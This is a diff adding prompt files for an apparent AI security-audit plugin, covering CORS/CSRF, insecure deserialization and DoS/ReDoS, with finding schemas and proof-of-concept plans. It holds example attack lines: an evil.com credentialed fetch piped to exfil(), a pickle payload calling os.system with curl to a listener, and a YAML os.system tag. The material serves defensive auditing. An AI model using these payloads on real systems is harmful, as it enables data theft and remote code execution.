+  "sanitizers_checked": "no origin allowlist (any origin reflected); credentials explicitly enabled; not gated to safe public endpoints; SameSite irrelevant — CORS read bypasses it; evil.com fetch('/api/account',{credentials:'include'}) succeeds and reads body",
+  "rationale": "Any malicious site visited by a logged-in user can read /api/account (PII + the anti-CSRF token), enabling account-data theft and downstream CSRF against token-protected writes. Same middleware also fronts /api/admin (admin.ts:9).",
+  "exploit_sketch": "On evil.com: fetch('https://app.example.com/api/account',{credentials:'include'}).then(r=>r.json()).then(d=>exfil(d)). ACAO echoes https://evil.com, ACAC:true -> browser exposes the response.",
+  "dynamic_poc_plan": "Authenticate to get a session cookie; replay GET /api/account with header 'Origin: https://evil.com' and observe the response carries 'Access-Control-Allow-Origin: https://evil.com' + 'Access-Control-Allow-Credentials: true' alongside the user's private body — proving cross-origin credentialed read.",
+  "proposed_fix": "Stop trusting the attacker-controlled Origin: the credentialed CORS policy must only echo origins from a closed, trusted allowlist so a foreign site can no longer read authenticated responses. (High-level direction; the exact mechanism is left to the implementing engineer.)"
+}
+```
+
+Accuracy bar: `source`, `sink`, `data_flow`, and `sanitizers_checked` must be
+concrete and true. For this class, `source` names the cross-origin provenance
+(forged request / reflected Origin / cross-origin message) and the auth
+mechanism that makes it exploitable (cookie/Basic — auto-attached). `sink` is
+the precise unguarded mutating handler or the exact ACAO/ACAC/framing config.
+`data_flow` traces how a foreign origin issues/reads the request and names every
+guard encountered and why it fails (token absent/exempt, SameSite=None,
+substring origin match, ACAC+reflection). `sanitizers_checked` is the §4 FP
+guard made explicit — list each control (token, SameSite, Origin check, CORS
+allowlist, framing header, postMessage origin check) and state it is absent or
+name the exact bypass. A route with no ambient credentials, an effective token,
+a SameSite-Lax/Strict cookie on a non-GET sink, or a closed-allowlist CORS
+policy is NOT a finding. Use `status:"likely"` for a proven static trace,
+`"confirmed"` only after dynamic repro, `"triage"` if the auth mechanism /
+reachability is uncertain.
+
+## 7. Dynamic PoC strategy
+
+Goal: prove a foreign origin can drive or read a credentialed action. Establish
+a real authenticated session first (the cookie is the ammunition), then attack
+from a *different* origin.
+
+1. **CSRF (cross-site write):** with a valid session cookie held by the
+   browser/agent, replay the state-changing request **without** the anti-CSRF
+   token and **with** a foreign/absent `Origin`/`Referer`
+   (`Origin: https://evil.example`). **Observed proof:** the server performs the
+   mutation (200 + the side effect verified out-of-band — record changed,
+   password reset, role granted). If it 403s on the missing token / bad Origin,
+   the guard holds → not a finding. For the realistic browser PoC, stand up an
+   attacker page that auto-submits a form / fires `fetch(..,
+   {credentials:'include', mode:'no-cors'})` to the target and confirm the
+   side effect lands while only the cookie (no token) traveled.
+2. **CORS (cross-origin read):** replay a credentialed request to the sensitive
+   endpoint with `Origin: https://evil.example`. **Observed proof:** the
+   response includes `Access-Control-Allow-Origin: https://evil.example` (echoed
+   or wildcard) **and** `Access-Control-Allow-Credentials: true`, and the body
+   contains private/session data — meaning attacker JS would be allowed to read
+   it. Run the bypass probes when an allowlist exists: `Origin:
+   https://trusted.com.evil.example` (suffix), `https://eviltrusted.com`
+   (unanchored regex), `Origin: null` — and check which the server reflects.
+3. **Clickjacking:** request the sensitive page and inspect response headers for
+   `X-Frame-Options` and CSP `frame-ancestors`. **Observed proof:** both absent
+   (or a permissive `frame-ancestors *`); confirm by loading the page in an
+   `<iframe src=...>` from a different origin and verifying it renders and its
+   buttons are clickable (a transparent-overlay PoC clinches it).
+4. **postMessage:** from an attacker-controlled framing page, `postMessage` a
+   crafted payload to the target frame and observe the handler acting on it
+   (navigation/state change) despite the foreign origin.
+
+Record the exact request/headers/payload and the observed evidence in the
+`Repro` object (`reproduced`, `method:"live-exploit"`, `poc`, `observed`,
+`impact`). A header-only confirmation (CORS reflection observed, framing headers
+absent) is sufficient proof for those sub-classes — set `method:"live-exploit"`
+and note that browser-side reachability was inferred from the headers.
diff --git a/plugins/security/prompts/finders/deserialization.md b/plugins/security/prompts/finders/deserialization.md
new file mode 100644
index 0000000..5554643
--- /dev/null
+++ b/plugins/security/prompts/finders/deserialization.md
@@ -0,0 +1,338 @@
+<!--
+FINDER PROMPT — deserialization. You are a fresh-context auditor hunting ONE
+class: Insecure Deserialization & Integrity. Read the target's code; emit finding
+objects. Signal discipline (AGENTS.md) is binding: only a REACHABLE
+untrusted-bytes -> object-reconstruction sink (or an unverified code/data
+ingestion channel) where no effective integrity check / safe-loader / type
+allowlist sits on the path is a finding. No defense-in-depth musings, no dead
+code, no posture items (a missing signing *policy* is not a finding; a code path
+that loads unsigned bytes IS).
+-->
+
+# Finder — Insecure Deserialization & Integrity (`deserialization`)
+
+**Class key:** `deserialization` · **OWASP:** A08:2025 · **CWE:** CWE-502
+(deserialization of untrusted data) / CWE-494 (download of code without integrity
+check) / CWE-345 (insufficient verification of data authenticity) ·
+**ASVS:** V2/V15
+
+## 1. Objective
+
+Find places where untrusted bytes are turned back into live objects by a
+deserializer that can instantiate arbitrary types or invoke logic during
+reconstruction (pickle/Marshal/YAML/native object streams), OR where code/data
+is fetched and executed/loaded without verifying its authenticity (unsigned
+update, plugin, or config channels). The bug is the bytes-on-the-wire becoming
+*behavior* — gadget-driven RCE on deserialize, or a tampered/forged payload that
+the app trusts because nothing checks a signature/hash.
+
+## 2. Where to look
+
+Entry points where externally-controlled bytes reach a rich deserializer, or
+where the app pulls in code/data it then trusts:
+
+- **Session / cookie / token stores:** server-side session backends that
+  serialize the session object (Rails `cookie_store` with `Marshal`, PHP
+  `$_SESSION` handler, signed-then-pickled Flask/Beaker sessions, JSF
+  `ViewState`, ASP.NET `__VIEWSTATE`/`LosFormatter`/`ObjectStateFormatter`).
+  A cookie/hidden-field that round-trips through a native serializer is the
+  classic sink.
+- **Caches & queues:** Redis/Memcached values, Sidekiq/Resque/Celery/Bull job
+  args, Kafka/RabbitMQ message bodies, anything `Marshal.dump`/`pickle.dumps`/
+  `serialize()` written then read back — second-order if an attacker can write
+  the cache/queue.
+- **Inter-service & RPC:** message bodies decoded with a polymorphic/typed
+  serializer (Java `ObjectInputStream`, .NET `BinaryFormatter`, Jackson with
+  default typing, Python `pickle` over a socket), gRPC/Thrift wrappers that fall
+  back to native serialization, webhook payloads parsed as YAML/pickle.
+- **Config / data import:** YAML/XML/JSON ingestion of user-supplied files or
+  request bodies — uploaded `.yml`/`.yaml`/`.xml`, "import settings", CI configs,
+  rule/template files, `.npmrc`/lockfiles parsed by a code-executing loader.
+- **File upload & document pipelines:** uploaded blobs deserialized for "resume",
+  "restore", "load model" (ML `torch.load`/`joblib.load`/`pickle` model files),
+  spreadsheet/notebook/save-game/state-blob loaders.
+- **Update / plugin / extension channels:** auto-updaters, plugin/theme
+  installers, remote module/script loaders, `eval`-on-fetched-content, dynamic
+  `require`/`import`/`dlopen` of a downloaded artifact, container/helm/terraform
+  module pulls — look for the *missing* signature/checksum verification on the
+  fetched bytes (CWE-494/345), and TOFU "verify only on first install".
+
+Route/handler/field signals to grep: `session`, `cookie`, `state`,
+`viewstate`, `token`, `payload`, `data`, `blob`, `restore`, `import`, `load`,
+`deserialize`, `unmarshal`, `unserialize`, `loads`, `from_*`, `cache`, `job`,
+`message`, `update`, `plugin`, `manifest`, `package`, `model`, `checkpoint`.
+
+Per-language SINK signals (the dangerous calls):
+
+- **Crystal:** there is no native object-graph deserializer with code-exec on
+  load; risk is YAML/MessagePack/JSON mapped onto **types chosen by the
+  payload** (a `Type` discriminator / union deserialized from input that selects
+  a class with side-effecting `after_initialize`/`from_yaml` hooks), or shelling
+  out / `eval`-equivalent on bytes pulled from an unverified channel. Also flag
+  `Process.run`/dynamic load of a fetched artifact without checksum/signature
+  (CWE-494). Plain `JSON.parse`/`YAML.parse` to a fixed struct is safe.
+- **Ruby:** `Marshal.load`/`Marshal.restore`, `YAML.load`/`YAML.unsafe_load`/
+  `Psych.load` (pre-3.1 `YAML.load` is unsafe; `Psych.unsafe_load` always),
+  `Oj.load` in `:object` mode, `Object#from_json`-style polymorphic loaders,
+  ERB/`eval` on fetched content, `Kernel.open`/`load`/`require` of a downloaded
+  path. Rails `MessageVerifier`/`MessageEncryptor` *with* `Marshal` coder and a
+  weak/leaked secret = forged Marshal payload.
+- **Node/TS:** `node-serialize` `unserialize()` (executes `_$$ND_FUNC$$_`),
+  `funcster`, `serialize-javascript` + `eval`, `cryo`, `js-yaml`
+  `yaml.load(... )` with a non-safe schema or custom `!!js/function` tags
+  (`DEFAULT_FULL_SCHEMA`), `vm.runInNewContext`/`eval`/`Function(x)` on a
+  payload, `JSON.parse` then `require(userPath)`, dynamic `import(userUrl)`.
+- **Python:** `pickle.load`/`pickle.loads`/`cPickle`/`dill`/`cloudpickle`,
+  `shelve`, `marshal.loads` of bytecode, `yaml.load(x)` **without**
+  `Loader=SafeLoader`/`yaml.safe_load` (full loader runs `!!python/object`/
+  `!!python/object/apply`), `jsonpickle.decode`, `torch.load`/`joblib.load`
+  (pickle under the hood), `numpy.load(..., allow_pickle=True)`,
+  `xml.etree`/`lxml` with entity expansion, `eval`/`exec`/`__import__` on input.
+- **Go:** `encoding/gob` `Decode` of untrusted streams into interface targets,
+  `encoding/xml`/`json` into `interface{}` with reflection-driven type selection,
+  third-party `mapstructure`/`yaml.Unmarshal` to a type chosen by a payload
+  discriminator, `plugin.Open` of a downloaded `.so`, `go-getter`/module fetch
+  without checksum. (Go has no native code-exec-on-decode; risk is gob to
+  interfaces, polymorphic dispatch, and unverified plugin/module loads.)
+- **PHP:** `unserialize($_*)` (PHP Object Injection — `__wakeup`/`__destruct`/
+  `__toString` gadgets), `unserialize` with no `allowed_classes`,
+  `yaml_parse` with `!php/object`, `Symfony Serializer` with `ObjectNormalizer`
+  on untrusted type, `phar://` stream wrapper on attacker path (metadata
+  unserialize), `eval`/`assert`/`create_function`/`include` of fetched content.
+- **Java:** `ObjectInputStream.readObject()` / `readUnshared()` on a request,
+  `XMLDecoder.readObject()`, Jackson `enableDefaultTyping()` /
+  `@JsonTypeInfo(use=CLASS)` polymorphic deserialization, `XStream` without a
+  type allowlist, SnakeYAML `new Yaml().load(x)` (constructs arbitrary types),
+  `Hessian`/`Kryo`/`Burlap`, RMI/JNDI lookups, `LosFormatter`/`BinaryFormatter`
+  (.NET interop). `Runtime.exec` of a downloaded jar / `URLClassLoader` of an
+  unverified URL.
+- **Rust:** typically memory-safe, but flag `serde` with
+  `#[serde(tag=...)]`/untagged enums driven by a payload that selects a variant
+  with side-effecting `Deserialize`, `bincode`/`rmp-serde` into trait objects,
+  `dlopen`/`libloading` of a downloaded library, and unverified
+  download-and-run/update flows (CWE-494).
+
+## 3. Detection heuristics
+
+**Taint SOURCES** (untrusted): HTTP cookies/headers/body/query/path, hidden
+form fields & view-state, uploaded files & their contents, cache/queue/message
+values an attacker can write (second-order), inter-service payloads from a
+zone an attacker can reach, and **bytes fetched from a remote update/plugin/
+module endpoint** (the network response is the untrusted input for the
+integrity sinks). A signed-or-encrypted blob is only trusted if the verification
+actually runs *before* deserialization and the key is secret — otherwise treat
+it as untrusted.
+
+**Taint SINKS** (dangerous op): the §2 calls. Two distinct sink shapes:
+
+1. **Rich deserializer (CWE-502):** a call that, while reconstructing, can
+   instantiate attacker-chosen types and trigger their constructors/magic
+   methods/registered hooks (pickle, Marshal, native object streams, full-schema
+   YAML, polymorphic Jackson/XStream/SnakeYAML, `node-serialize`,
+   `unserialize`). Reaching it with attacker bytes = gadget-chain RCE potential.
+2. **Unverified code/data ingestion (CWE-494/345):** fetch-then-execute/load
+   where no signature or checksum gates the bytes (auto-update, plugin install,
+   remote `require`/`import`/`dlopen`, `eval` on fetched text).
+
+Vulnerable patterns to confirm:
+
+- **Untrusted bytes -> native deserializer:** `pickle.loads(request.body)`,
+  `Marshal.load(cookies[:s])`, `unserialize($_GET['x'])`,
+  `ObjectInputStream(req.getInputStream()).readObject()`,
+  `unserialize(req.body)` (node-serialize). Confirm the input is attacker-set and
+  the deserializer is the rich/polymorphic kind, not a fixed-schema JSON map.
+- **Unsafe YAML loader:** `yaml.load(x)` (Python, no SafeLoader),
+  `YAML.load`/`Psych.unsafe_load` (Ruby), `js-yaml` full schema, SnakeYAML
+  default constructor — input contains `!!python/object/apply:os.system`,
+  `!ruby/object:`, `!!js/function`, or a Java type tag. The tell is a *non-safe*
+  loader on a value that crosses a trust boundary.
+- **Polymorphic type selection from payload:** Jackson default typing /
+  `@class`/`$type` discriminator, XStream/SnakeYAML class construction,
+  jsonpickle, a custom `type` field that does `Object.const_get(t).new(...)` /
+  `Class.forName(t)` / `globals()[t]` — the payload picks the class, enabling
+  gadget instantiation even over "JSON".
+- **Magic-method gadget surface (PHP/Python/Ruby/Java):** the codebase or its
+  deps contain classes with `__wakeup`/`__destruct`/`__toString`/`readObject`/
+  `finalize`/`def _ _reduce_ _` that do file/IO/exec/SQL — a usable gadget. You
+  do not need the full chain to flag; an untrusted feed into `unserialize`/
+  `readObject` with no class allowlist is the finding.
+- **phar deserialization (PHP):** any filesystem call (`file_exists`, `fopen`,
+  `getimagesize`, `unlink`) on an attacker-controlled path that may carry a
+  `phar://` wrapper — metadata is unserialized on access.
+- **Forged signed/encrypted blob:** a `MessageVerifier`/HMAC/JWT-wrapped
+  serialized object where the secret is hardcoded, defaulted, leaked, or the
+  algorithm is `none`/unverified — attacker forges the inner Marshal/pickle and
+  it deserializes. The crypto wrapper is *not* a mitigation if the key is
+  guessable or the verification is skipped.
+- **Unsigned update / plugin (CWE-494/345):** code/artifact downloaded over a
+  channel without checksum-or-signature verification before
+  exec/load/`require`/`dlopen`/extract, signature verified with a hardcoded/empty
+  key, TOFU-only ("verify first time, trust forever"), or the download URL itself
+  is attacker-influenceable (chains with SSRF/MITM). Plain HTTP fetch of a
+  to-be-executed artifact is in scope.
+- **Second-order:** an attacker writes a cache/queue/DB value that is later
+  `Marshal.load`/`pickle.loads`-ed by a worker — trace the *read* site and prove
+  the write is attacker-reachable.
+
+## 4. Not-a-finding (false-positive guard) — check BEFORE flagging
+
+Do NOT report if any of these is present AND effective on the path:
+
+- **Safe loader / fixed-schema parser:** `yaml.safe_load`/`Loader=SafeLoader`/
+  `Psych.safe_load`/`YAML.safe_load` with a default-empty `permitted_classes`,
+  `js-yaml` default (safe) schema, `json.loads`/`JSON.parse`/`encoding/json`
+  into a **declared struct/class** (no polymorphic type from payload), Crystal
+  `from_json`/`from_yaml` onto a concrete type, protobuf/`MessagePack` into a
+  fixed schema. These cannot instantiate attacker-chosen code-bearing types —
+  not a finding.
+- **Class allowlist on the deserializer:** PHP `unserialize($x, ['allowed_classes'
+  => [...]])` (or `false`), Java `ObjectInputFilter`/`setObjectInputFilter`/
+  validating resolve, XStream `allowTypes`/permissions, Jackson
+  `PolymorphicTypeValidator`/`activateDefaultTyping(ptv)` with a tight base,
+  SnakeYAML `SafeConstructor`, Ruby `safe_load(permitted_classes: [Symbol,...])`
+  restricted to inert types. If the allowlist truly excludes any class with an
+  exploitable hook, it's safe; if it permits a gadget type, it is NOT.
+- **Authenticated integrity BEFORE deserialize, with a real secret:** a MAC/
+  signature (HMAC, Ed25519, `MessageVerifier`, JWS) verified on the bytes
+  *prior* to handing them to the deserializer, where the key is server-side,
+  high-entropy, not defaulted/committed, and the algorithm is fixed (not `none`,
+  no alg-confusion). This closes the *forgery* path — attacker cannot supply
+  arbitrary bytes. (It does NOT help if an authenticated attacker can still get
+  the server to sign their object, e.g. self-service session contents — then the
+  deserializer is still reachable with attacker data.)
+- **Update/plugin channel verifies authenticity:** signature checked against a
+  pinned public key (not fetched alongside the artifact), or a strong checksum
+  pinned in trusted source/lockfile and compared before use, over a channel where
+  the key/hash isn't attacker-substitutable. TLS alone is NOT integrity for the
+  artifact (it protects transport, not a compromised mirror/registry) — credit
+  it only as transport, not as the §3 integrity control.
+- **Bytes provably not attacker-influenced:** the serialized source is a trusted
+  internal store the attacker cannot write (server-generated, never round-trips
+  through the client, no cross-tenant write), a hardcoded/bundled asset, or a
+  fixture/test file — no untrusted source reaches the sink.
+- **Loader called only on developer-controlled input at build/boot:** `yaml.load`
+  of an app's own bundled config read from the repo (not user-uploaded, not
+  request-driven) — no trust boundary crossed.
+
+If a guard exists but is bypassable, it is NOT a mitigation — flag it and name
+the bypass in `sanitizers_checked`: an allowlist that still permits a gadget
+class; HMAC with a default/committed/leaked secret or `alg:none`/alg-confusion;
+"safe" YAML that still resolves a dangerous custom tag; a checksum fetched from
+the same untrusted source as the artifact; signature verification that is
+TOFU-only or skipped on a code path; `allowed_classes` set on the wrong call;
+phar guard that only blocks `phar://` literally but not via wrapper aliases.
+
+## 5. Severity guidance
+
+- **Critical** — unauthenticated, reachable untrusted-bytes -> rich deserializer
+  (pickle/Marshal/`unserialize`/`ObjectInputStream`/full-YAML/polymorphic) with a
+  plausible gadget in the app or its dependency graph -> RCE; OR an unsigned
+  update/plugin/remote-load channel that runs attacker-substitutable code on the
+  server with no integrity check. Server-side code execution, no auth needed.
+- **High** — same sink class but behind an auth wall or requiring realistic
+  conditions (authenticated user can place the payload, second-order via a cache/
+  queue the attacker can write), or forgeable signed-blob deserialization where
+  the secret is weak/leaked; impact is still RCE or full object-graph control.
+- **Medium** — polymorphic/type-driven deserialization where no exploitable
+  gadget is evident but type selection is attacker-controlled (DoS, type
+  confusion, partial control), YAML/XML into a fixed type with only entity-
+  expansion/DoS reach, or an integrity gap mitigated partially (checksum present
+  but weak, TLS-only on a low-value artifact).
+- **Low/Info** — deserialization of data the attacker cannot influence, a safe
+  loader misread on first glance, or a theoretical gadget with no reachable
+  source — downgrade or drop per §4.
+
+Second-order (cache/queue-fed) deserialization keeps the severity of the sink;
+note the write->read path and who can write the store in `rationale`.
+
+## 6. Emit findings as
+
+One JSON object per distinct root cause (dedup call sites; list extras in
+`rationale`). Fields:
+
+```json
+{
+  "id": "deserialization-001",
+  "title": "Unauthenticated RCE via Marshal.load of attacker-controlled session cookie",
+  "vuln_class": "deserialization",
+  "owasp": "A08:2025",
+  "cwe": "CWE-502",
+  "asvs": "V2",
+  "severity": "critical",
+  "status": "likely",
+  "confidence": "high",
+  "file": "app/middleware/session_loader.rb",
+  "line": 18,
+  "end_line": 20,
+  "code_excerpt": "raw = Base64.decode64(cookies[:_state])\nsession = Marshal.load(raw)",
+  "source": "cookies[:_state] — client-supplied cookie, base64-decoded, no signature/MAC checked before load",
+  "sink": "Marshal.load(raw) — Ruby native object-graph deserializer; instantiates arbitrary types and runs their hooks on reconstruction",
+  "data_flow": "cookies[:_state] -> Base64.decode64 -> Marshal.load; bytes go straight into the rich deserializer with no MessageVerifier/HMAC/safe_load between source and sink; attacker fully controls the byte stream",
+  "sanitizers_checked": "no integrity check before load (no MessageVerifier/HMAC verify on the path); not safe_load and Marshal has no class allowlist; cookie is not signed/encrypted; gadget chain present via Gem::Requirement/erb in bundled deps",
+  "rationale": "Reachable on every request from an unauth route via the cookie. A Universal Ruby gadget chain (e.g. through a loaded gem) yields command execution on deserialize. Same Marshal.load read at workers/cache_reader.rb:44 (second-order via Redis).",
+  "exploit_sketch": "Craft a malicious Marshal payload with a known Ruby gadget chain, base64-encode, set as the _state cookie, send any request -> Marshal.load reconstructs the chain -> command runs.",
+  "dynamic_poc_plan": "Build a benign-but-observable gadget (e.g. one that touches a unique file or triggers an outbound request to a listener); send it as the cookie; observe the side effect (file created / listener hit) proving code ran during deserialize.",
+  "proposed_fix": "Client-held state must not flow into a rich object-graph deserializer; move to an authenticated, fixed-schema representation so attacker bytes can never reconstruct arbitrary types. (Exact mechanism and code left to the implementer.)"
+}
+```
+
+Accuracy bar: `source`, `sink`, `data_flow`, and `sanitizers_checked` must be
+concrete and true. `data_flow` traces variables source->sink and states why the
+bytes reach a *rich* deserializer (or an unverified load) rather than a
+fixed-schema parser, naming any integrity/allowlist guard encountered and why it
+fails. `sanitizers_checked` is the FP guard made explicit — list each §4 control
+and state it is absent or, if present, name the exact bypass (e.g. "HMAC secret
+is the committed default in config/secrets.yml" or "allowed_classes includes
+ERB"). A finding without an untrusted source reaching a real deserializer/
+unverified-load sink is not a finding. Pick `cwe`: 502 for object-reconstruction
+deserialization, 494 for download-of-code-without-integrity, 345 for general
+authenticity-verification gaps (forged signed blobs, missing/forgeable
+checksums). Use `status:"likely"` for a proven static trace, `"confirmed"` only
+after dynamic repro, `"triage"` if reachability/source/gadget availability is
+uncertain.
+
+## 7. Dynamic PoC strategy
+
+Goal: prove the running app turns attacker bytes into behavior (code exec or
+trusted-state forgery), not just parses data. Pick the proof matching the sink:
+
+1. **Rich deserializer -> code exec (observable side effect).** Build a
+   *benign* payload using a real gadget for the runtime and library set
+   (`ysoserial`/`ysoserial.net` for Java/.NET, a Ruby/PHP/Python gadget chain, or
+   `node-serialize`'s IIFE form), where the gadget performs a harmless,
+   observable action — write a unique file under `/tmp`, `sleep N`, or fire an
+   outbound request to a controlled listener with a nonce. Deliver it via the
+   real channel (cookie/header/body/upload/queue). **Observed proof** = the side
+   effect occurs (the nonce file appears, latency tracks the sleep, or the
+   listener records the callback) — impossible if the bytes were parsed as inert
+   data.
+   - Python pickle: payload whose `_ _reduce_ _` returns `(os.system, ("curl
+     http://<listener>/<nonce>",))`.
+   - PHP: object with a `__destruct`/`__wakeup` gadget; deliver via the
+     `unserialize` source (or `phar://` upload + a filesystem op on its path).
+   - YAML: `!!python/object/apply:os.system ["sleep 5"]` /
+     `!ruby/object` / `!!js/function` against the unsafe loader.
+2. **Forged signed/encrypted blob.** If the channel wraps the object in a MAC/
+   signature, test the secret: try the framework default secret, a value found in
+   the repo/env dump, or `alg:none`/alg-confusion. **Observed proof** = a
+   self-forged serialized payload is accepted and deserialized (side effect from
+   step 1 fires), demonstrating the integrity layer is bypassable.
+3. **Polymorphic / type-driven (no full gadget).** Send a payload selecting an
+   unexpected class via the discriminator (`@class`/`$type`/`type` field, YAML
+   tag). **Observed proof** = the app instantiates the chosen type (distinct
+   error, side effect, or behavior change) — confirms attacker-controlled type
+   selection even if RCE isn't reached; report at the severity that control
+   warrants.
+4. **Unsigned update / plugin (integrity gap).** Stand up a malicious
+   mirror/registry response (or MITM the fetch in the test env) serving a
+   tampered artifact with a benign marker. **Observed proof** = the app installs/
+   loads/executes the tampered artifact (marker side effect fires) without
+   rejecting it — proves no effective signature/checksum gate.
+
+Record the exact payload, delivery request, and observed evidence in the `Repro`
+object (`reproduced`, `method:"live-exploit"`, `poc`, `observed`, `impact`). A
+sleep/OOB callback alone proves code execution — set `method:"live-exploit"` and
+note any blindness in `notes`. If the app can't be run, fall back to a focused
+unit test that drives the sink with the gadget payload
+(`method:"unit-test"`); a build-only check that confirms a vulnerable
+loader/no-integrity path is `method:"build-only"` and stays `status:"likely"`.
diff --git a/plugins/security/prompts/finders/dos-redos.md b/plugins/security/prompts/finders/dos-redos.md
new file mode 100644
index 0000000..ff23c0e
--- /dev/null
+++ b/plugins/security/prompts/finders/dos-redos.md
@@ -0,0 +1,339 @@
+<!--
+FINDER PROMPT — dos-redos. You are a fresh-context auditor hunting ONE class:
+Denial of Service & ReDoS. Read the target's code; emit finding objects. Signal
+discipline (AGENTS.md) is binding: only a REACHABLE path from untrusted input to
+a sink whose COST (CPU, memory, time, disk, FDs) the attacker can blow up
+super-linearly or unboundedly, with no effective limit/timeout/validator on the
+path, is a finding. No defense-in-depth musings, no dead code, no posture items.
+A regex that is merely "complex" is not a finding unless an attacker controls the
+subject string and the pattern is provably super-linear.
+-->
+
+# Finder — Denial of Service & ReDoS (`dos-redos`)
+
+**Class key:** `dos-redos` · **OWASP:** A06:2025 · **CWE:** CWE-1333 (ReDoS) /
+CWE-400 (uncontrolled resource consumption) / CWE-770 (alloc without limit) /
+CWE-834 (excessive iteration) · **ASVS:** V2
+
+## 1. Objective
+
+Find places where untrusted input drives an operation whose cost (CPU time,
+memory, disk, file descriptors, threads, output size) grows super-linearly or
+without bound, so a single small request — or a few of them — exhausts a
+resource and denies service. The bug is the *attacker controlling the amount of
+work*, not the correctness of the result.
+
+## 2. Where to look
+
+Entry points where a request value reaches an expensive or unbounded operation:
+
+- **Regex on request data:** input matched/validated against a regex —
+  validators on email/URL/slug/phone/markup, route constraints, log/UA parsers,
+  search highlighters, sanitizers, content-type/Accept parsing, CSV/markdown/
+  template processing. Highest risk where the *pattern is static but the subject
+  is attacker-controlled and unbounded in length*.
+- **Body / upload size:** JSON/form/multipart/GraphQL bodies parsed before any
+  size check; file uploads buffered fully into memory; streaming endpoints read
+  to completion. Look for missing `client_max_body_size` / body-limit middleware
+  / `MaxBytesReader`.
+- **Decompression & archives:** gzip/deflate/brotli request bodies, `.zip`/
+  `.tar.gz`/`.gz` uploads expanded to disk/memory, image/PDF/XML decoders, nested
+  archives — zip bombs (high compression ratio), decompression to unbounded size,
+  zip-slip-adjacent file-count/entry-count blowups.
+- **Pagination / fan-out / loops:** `limit`/`per_page`/`count`/`size`/`n`/`depth`
+  /`repeat`/`times` taken from input and used as a loop bound, array size,
+  range, or batch size with no cap; recursive parsers/serializers whose depth is
+  input-driven (deeply nested JSON/XML/YAML — "billion laughs", recursive
+  GraphQL); `Array.new(n)`/`"x" * n` style pre-allocation from input.
+- **XML / markup expansion:** XML entity expansion (DTD, `ENTITY`), YAML
+  anchors/aliases (`*a`), nested JSON depth, GraphQL query depth/aliasing/
+  introspection abuse, template engines expanding input-driven loops.
+- **Expensive crypto / hashing on input:** attacker-chosen iteration counts or
+  key sizes (PBKDF2/bcrypt/scrypt/argon2 cost from input), RSA key parsing of
+  huge moduli, signature checks on unbounded data.
+- **Unbounded external/IO work:** DB queries with input-controlled `LIMIT`/no
+  limit returning whole tables, N+1 driven by input array length, sleeping/
+  retrying loops whose count/delay comes from input, spawning processes/threads
+  per request item, opening FDs/sockets per input element.
+
+Route/param signals to grep: `limit`, `count`, `size`, `per_page`, `page`,
+`offset`, `depth`, `n`, `num`, `repeat`, `times`, `length`, `width`, `height`,
+`quality`, `iterations`, `rounds`, `pattern`, `regex`, `q`, `search`, `filter`,
+`format`, `range`, `from`/`to`, `Content-Length`, `Content-Encoding`,
+`Accept`/`Range` headers, multipart filenames.
+
+Per-language SINK signals:
+
+- **Crystal:** `Regex.new(user)` / `str =~ /.../` with attacker `str`; `body =
+  request.body.try(&.gets_to_end)` with no size cap; `Array.new(n)` /
+  `"x" * n` from params; `Compress::Gzip::Reader` / `Compress::Zip::File`
+  reading uploads unbounded; `JSON.parse` on unbounded body (no `max` framework
+  guard); recursion over parsed input.
+- **Ruby:** `subject =~ /(\w+)+$/` or `Regexp.new(params[:re])`; Rack/Rails
+  reading `request.body.read` without limit; `params[:n].to_i.times { ... }`,
+  `Array.new(params[:n].to_i)`, `"a" * params[:n].to_i`; `Zlib::GzipReader`,
+  `Zip::File.open` extracting entries without size/count cap; `Nokogiri::XML(x)`
+  without `NONET`/no-DTD; `JSON.parse(x)` deep nesting; `Marshal.load` size.
+- **Node/TS:** a static catastrophic regex `.test(req.query.x)` / `.match()`;
+  `new RegExp(req.body.pattern)`; `express.json()` without `limit`; reading the
+  whole stream (`for await (const c of req)`) with no cap; `zlib.gunzipSync`/
+  `inflateSync` on request data; `unzipper`/`adm-zip`/`tar.extract` of uploads;
+  `Array(n).fill()` / `Buffer.alloc(n)` / `'x'.repeat(n)` from input;
+  unbounded GraphQL query (no depth/cost limit plugin); `JSON.parse` of huge body.
+- **Python:** `re.match(r'...', user)` super-linear / `re.compile(user_pattern)`;
+  Flask/Django reading `request.data`/`request.get_data()` / no
+  `DATA_UPLOAD_MAX_MEMORY_SIZE`; `gzip.decompress(data)`, `zipfile.ZipFile
+  (...).extractall()` / `tarfile.open().extractall()` (also reads `.file_size`),
+  `bz2`/`lzma` on input; `[0]*n`, `' '*n`, `range(n)` loops from input;
+  `lxml.etree.parse` with DTD/entities not disabled; `xml.sax`/`xmlrpc`;
+  `PIL.Image.open` on huge dimensions (decompression bomb).
+- **Go:** `regexp.MustCompile` is RE2 (linear — usually NOT ReDoS; see §4), but
+  `io.ReadAll(r.Body)` without `http.MaxBytesReader`, `gzip.NewReader` /
+  `archive/zip` / `archive/tar` reading without limiting `io.Copy` (use
+  `io.LimitReader`), `make([]T, n)` / `make([]byte, n)` with input `n`,
+  `strings.Repeat(s, n)`, input-bounded `for` loops, `encoding/json` deep nesting.
+- **PHP:** `preg_match('/(a+)+$/', $input)` (PCRE backtracking, also
+  `pcre.backtrack_limit`); reading `php://input` / large `$_POST` without
+  `post_max_size` enforced in code; `gzdecode`/`gzuncompress`/`bzdecompress` on
+  input, `ZipArchive::extractTo`, `unserialize` on big input; `str_repeat($s,$n)`
+  / `array_fill(0,$n,...)` from request; `simplexml_load_string` with DTD.
+- **Java:** `Pattern.compile(p)` / `s.matches(regex)` with backtracking groups;
+  `Pattern.compile(userPattern)`; reading the full `InputStream`/multipart
+  without `maxRequestSize` / `DataBufferLimitException` config;
+  `GZIPInputStream`/`ZipInputStream`/`ZipFile.entries()` without size/count cap
+  (`getSize()`/`getCompressedSize()` ratio); `DocumentBuilderFactory` with
+  external entities/DTD enabled (XXE-DoS); `new int[n]` / `new byte[n]` from
+  input; input-driven recursion (`StackOverflowError`).
+- **Rust:** the `regex` crate is linear-time (NOT ReDoS) — but `fancy-regex`
+  (backtracking) with attacker subject is; `hyper`/`axum` body read without
+  `RequestBodyLimitLayer` / `Content-Length` check; `flate2::GzDecoder` /
+  `zip`/`tar` extract without limiting bytes; `vec![0u8; n]` /
+  `Vec::with_capacity(n)` / `String::repeat` from input; `serde_json` deep
+  nesting (mitigated by recursion limit — verify version).
+
+## 3. Detection heuristics
+
+**Taint SOURCES** (untrusted, and crucially their *size/count/value magnitude*):
+HTTP query/body/path/header/cookie values and their **length**; `Content-Length`,
+`Content-Encoding`, `Range`, `Accept` headers; multipart file contents, sizes,
